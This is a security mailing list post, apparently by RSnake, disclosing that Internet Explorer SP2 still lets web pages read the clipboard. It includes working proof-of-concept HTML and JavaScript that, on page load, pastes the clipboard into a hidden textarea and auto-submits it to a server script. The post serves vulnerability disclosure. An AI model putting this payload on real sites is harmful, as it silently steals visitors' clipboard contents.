clipboard vuln still working in SP2?

[RSnake <rsnake () shocking com>]

        I have seen a few exploits about this (one by Tom Gilder in 2002 using
clipboardData.getData("Text"); and one by Juan Carlos Garcia Cuartango using
execCommand("Paste"); which is similar to the one below). However, I believed
this was going to be solved in IE SP2.  I cannot see any reason why websites,
by default, should be allowed access to my clipboard.  Working sample code is
located at:

http://www.shocking.com/~rsnake/cutandpaste.html

        Here is the code for it (why wasn't this fixed in SP2?):

<body onload="cutandpaste();">
<form name=f action="cutandpaste.cgi">
  <input type="submit" class="button" name="s"/>
  <TEXTAREA rows=1 cols=1 maxlength=4000 name=clipb value="a"></TEXTAREA>
</form>
<script>
  function cutandpaste() {
    document.f.clipb.createTextRange().execCommand("SelectAll");
    document.f.clipb.createTextRange().execCommand("Paste");
    document.all.f.s.click();
  }
</script>
</body>

-R

The information in this email is confidential and may be legally
privileged.  It is intended solely for the addressee.  Access to
this email by anyone else is unauthorized.  If you are not the
intended recipient, any disclosure, copying, distribution or any
action taken or omitted to be taken in reliance on it is
expressly prohibited and may be unlawful.